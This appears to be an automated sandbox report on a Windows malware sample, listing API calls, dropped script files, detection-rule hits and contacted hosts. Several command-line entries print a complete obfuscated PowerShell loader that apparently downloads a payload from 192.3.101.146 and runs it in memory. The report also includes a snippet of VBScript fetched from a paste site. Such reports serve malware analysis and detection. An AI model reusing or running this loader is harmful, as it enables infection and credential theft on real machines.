1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02609000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fd9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fda000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fdb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fdc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fdd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fde000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fdf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2396
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fe4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Windows\Temp\coroclisis.vbs
file C:\Windows\Temp\sombrous.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\sombrous.bat
cmdline cmd.exe /c C:\Windows\Temp\sombrous.bat
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#c#Bv#HI#d##g#D0#I##n#HQ#e#B0#C4#Z#Bv#G8#ZwBr#Gw#YwBl#Gg#YwBu#HI#dQB0#GU#ZQBy#G8#ZgBk#G8#bwBn#HI#bwBm#HQ#cgBl#HM#bgBp#G4#YQBj#GU#dw#v#DI#Mg#x#C8#NQ#4#DE#Lg#0#DI#Mg#u#Dk#Lg#2#DE#Mg#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GE#dQBz#HQ#aQBu#Gk#d#Bl#C##PQ#g#CQ#ZQB4#H##bwBy#HQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HY#aQBj#Gk#cwBz#Gk#d#B5#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#Dk#Mg#u#DM#Lg#x#D##MQ#u#DE#N##2#C8#e#Bh#G0#c#Bw#C8#d#Bl#HM#d##v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#C##PQ#g#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBp#GM#aQBz#HM#aQB0#Hk#KQ#7#CQ#e#B5#Gw#bwBn#HI#YQBw#Gg#ZQBk#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#Ck#Ow#k#Gw#YQB1#G4#Z#By#Hk#dwBv#G0#ZQBu#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bj#GE#c#By#G8#bgBp#GM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#RQBs#HY#aQBz#Hk#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#p#Ds#J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bj#GE#c#By#G8#bgBp#GM#KQ#7#CQ#RQBs#HY#aQBz#Hk#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##t#Gc#d##g#CQ#RQBs#HY#aQBz#Hk#Ow#k#EU#b#B2#Gk#cwB5#C##Kw#9#C##J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#C##PQ#g#CQ#cgBl#HM#d#Bv#HI#YQB0#Gk#dgBl#C##LQ#g#CQ#RQBs#HY#aQBz#Hk#Ow#k#H##cgBp#HM#cwBp#GU#cg#g#D0#I##k#Hg#eQBs#G8#ZwBy#GE#c#Bo#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#BF#Gw#dgBp#HM#eQ#s#C##J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#Ck#Ow#k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bw#HI#aQBz#HM#aQBl#HI#KQ#7#CQ#cgBl#Gk#bQBw#HI#aQBz#G8#bgBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##p#Ds#J#Bj#HU#dgBl#G4#YQBu#HQ#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bh#HU#cwB0#Gk#bgBp#HQ#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
cmdline powershell -NoProfile -Command "$Codigo = 'J#Bl#Hg#c#Bv#HI#d##g#D0#I##n#HQ#e#B0#C4#Z#Bv#G8#ZwBr#Gw#YwBl#Gg#YwBu#HI#dQB0#GU#ZQBy#G8#ZgBk#G8#bwBn#HI#bwBm#HQ#cgBl#HM#bgBp#G4#YQBj#GU#dw#v#DI#Mg#x#C8#NQ#4#DE#Lg#0#DI#Mg#u#Dk#Lg#2#DE#Mg#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GE#dQBz#HQ#aQBu#Gk#d#Bl#C##PQ#g#CQ#ZQB4#H##bwBy#HQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HY#aQBj#Gk#cwBz#Gk#d#B5#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#Dk#Mg#u#DM#Lg#x#D##MQ#u#DE#N##2#C8#e#Bh#G0#c#Bw#C8#d#Bl#HM#d##v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#C##PQ#g#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBp#GM#aQBz#HM#aQB0#Hk#KQ#7#CQ#e#B5#Gw#bwBn#HI#YQBw#Gg#ZQBk#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#Ck#Ow#k#Gw#YQB1#G4#Z#By#Hk#dwBv#G0#ZQBu#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bj#GE#c#By#G8#bgBp#GM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#RQBs#HY#aQBz#Hk#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#p#Ds#J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bj#GE#c#By#G8#bgBp#GM#KQ#7#CQ#RQBs#HY#aQBz#Hk#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##t#Gc#d##g#CQ#RQBs#HY#aQBz#Hk#Ow#k#EU#b#B2#Gk#cwB5#C##Kw#9#C##J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#C##PQ#g#CQ#cgBl#HM#d#Bv#HI#YQB0#Gk#dgBl#C##LQ#g#CQ#RQBs#HY#aQBz#Hk#Ow#k#H##cgBp#HM#cwBp#GU#cg#g#D0#I##k#Hg#eQBs#G8#ZwBy#GE#c#Bo#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#BF#Gw#dgBp#HM#eQ#s#C##J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#Ck#Ow#k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bw#HI#aQBz#HM#aQBl#HI#KQ#7#CQ#cgBl#Gk#bQBw#HI#aQBz#G8#bgBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##p#Ds#J#Bj#HU#dgBl#G4#YQBu#HQ#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bh#HU#cwB0#Gk#bgBp#HQ#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c C:\Windows\Temp\sombrous.bat
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -NoProfile -Command "$Codigo = 'J#Bl#Hg#c#Bv#HI#d##g#D0#I##n#HQ#e#B0#C4#Z#Bv#G8#ZwBr#Gw#YwBl#Gg#YwBu#HI#dQB0#GU#ZQBy#G8#ZgBk#G8#bwBn#HI#bwBm#HQ#cgBl#HM#bgBp#G4#YQBj#GU#dw#v#DI#Mg#x#C8#NQ#4#DE#Lg#0#DI#Mg#u#Dk#Lg#2#DE#Mg#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GE#dQBz#HQ#aQBu#Gk#d#Bl#C##PQ#g#CQ#ZQB4#H##bwBy#HQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HY#aQBj#Gk#cwBz#Gk#d#B5#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#Dk#Mg#u#DM#Lg#x#D##MQ#u#DE#N##2#C8#e#Bh#G0#c#Bw#C8#d#Bl#HM#d##v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#C##PQ#g#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBp#GM#aQBz#HM#aQB0#Hk#KQ#7#CQ#e#B5#Gw#bwBn#HI#YQBw#Gg#ZQBk#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#Ck#Ow#k#Gw#YQB1#G4#Z#By#Hk#dwBv#G0#ZQBu#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bj#GE#c#By#G8#bgBp#GM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#RQBs#HY#aQBz#Hk#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#p#Ds#J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bj#GE#c#By#G8#bgBp#GM#KQ#7#CQ#RQBs#HY#aQBz#Hk#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##t#Gc#d##g#CQ#RQBs#HY#aQBz#Hk#Ow#k#EU#b#B2#Gk#cwB5#C##Kw#9#C##J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#C##PQ#g#CQ#cgBl#HM#d#Bv#HI#YQB0#Gk#dgBl#C##LQ#g#CQ#RQBs#HY#aQBz#Hk#Ow#k#H##cgBp#HM#cwBp#GU#cg#g#D0#I##k#Hg#eQBs#G8#ZwBy#GE#c#Bo#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#BF#Gw#dgBp#HM#eQ#s#C##J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#Ck#Ow#k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bw#HI#aQBz#HM#aQBl#HI#KQ#7#CQ#cgBl#Gk#bQBw#HI#aQBz#G8#bgBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##p#Ds#J#Bj#HU#dgBl#G4#YQBu#HQ#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bh#HU#cwB0#Gk#bgBp#HQ#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://crl.comodo.net/TrustedCertificateServices.crl0
url http://users.ocsp.d-trust.net03
url http://crl.ssc.lt/root-b/cacrl.crl0
url http://crl.securetrust.com/STCA.crl0
url http://crl.securetrust.com/SGCA.crl0
url http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url http://www.ssc.lt/cps03
url http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url http://www.pkioverheid.nl/policies/root-policy0
url http://cps.chambersign.org/cps/chambersroot.html0
url http://www.e-szigno.hu/SZSZ/0
url http://www.entrust.net/CRL/Client1.crl0
url http://crl.chambersign.org/publicnotaryroot.crl0
url http://crl.comodo.net/AAACertificateServices.crl0
url http://www.certplus.com/CRL/class3.crl0
url http://logo.verisign.com/vslogo.gif0
url http://www.acabogacia.org/doc0
url http://www.disig.sk/ca/crl/ca_disig.crl0
url https://www.catcert.net/verarrel
url http://www.sk.ee/cps/0
url http://www.quovadis.bm0
url https://www.catcert.net/verarrel05
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url http://crl.chambersign.org/chambersroot.crl0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url http://crl.globalsign.net/root-r2.crl0
url http://certificates.starfieldtech.com/repository/1604
url http://www.d-trust.net0
url http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url http://crl.ssc.lt/root-a/cacrl.crl0
url http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url http://www.certicamara.com/certicamaraca.crl0
url http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url http://www.post.trust.ie/reposit/cps.html0
url http://qual.ocsp.d-trust.net0
url http://www2.public-trust.com/crl/ct/ctroot.crl0
url http://www.certicamara.com0
url http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
url http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
url http://www.comsign.co.il/cps0
url http://crl.usertrust.com/UTN-USERFirst-NetworkApplications.crl0
url http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
url http://www.signatur.rtr.at/de/directory/cps.html0
url http://www.globaltrust.info0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
host 192.3.101.146
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://pastefy.app/SXZ0OaCN/raw
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /SXZ0OaCN/raw
1 13369356 0

InternetCrackUrlA

url: https://pastefy.app/SXZ0OaCN/raw
flags: 0
1 1 0

InternetReadFile

buffer: Sub aetosaur microindustry = calycophyllum For i = 1 To UBound(microindustry) Step 2 reastiness = microindustry(i) financialist = deflow(Array( "VBScripting.%s", reastiness )) Chickasawhay = deflow(Array( "{%s}", microindustry(i + 1) )) Deleter.DeleteKey Root, deflow(Array( _ "Software\Classes\%s\", financialist _ )) Deleter.DeleteKey Root, deflow(Array( _ "Software\Classes\CLSID\%s\", Chickasawhay _ )) Deleter.DeleteKey Root, deflow(Array( _ "Software\WOW6432Node\Classes\CLSID\%s\", Chickasawhay _ )) Deleter.DeleteKey Root, deflow(Array( _ "Software\Classes\WOW6432Node\CLSID\%s\", Chickasawhay _ )) Next Dim microindustry, i, reastiness, financialist, Chickasawhay End Sub Sub germicides reentering = 0 rostel End Sub Sub rostel headmost reentering = reentering + 1 If reentering > UBound( composer ) Then reentering = 0 Exit Sub End If window.setTimeout composer( reentering ), 1, VBScript End Sub Sub inscript Dim app 'HTML application object reference Dim discontinuee, pluriovular, thyroids, alienably, gramineae, petraria 'strings Set sh = CreateObject( "WScript.Shell" ) Set missorted = CreateObject( "Scripting.FileSystemObject" ) Set app = document.getElementsByTagName( "application" )(0) document.Title = app.applicationName wimpiness = Replace(missorted.GetParentFolderName(app.CommandLine), """", "") Set deflow = New StringFormatter discontinuee = "spec\suite" pluriovular = "TestLauncher" thyroids = "examples\Generate-the-CSharp-docs.vbs | examples\Generate-the-VBScript-docs.vbs" 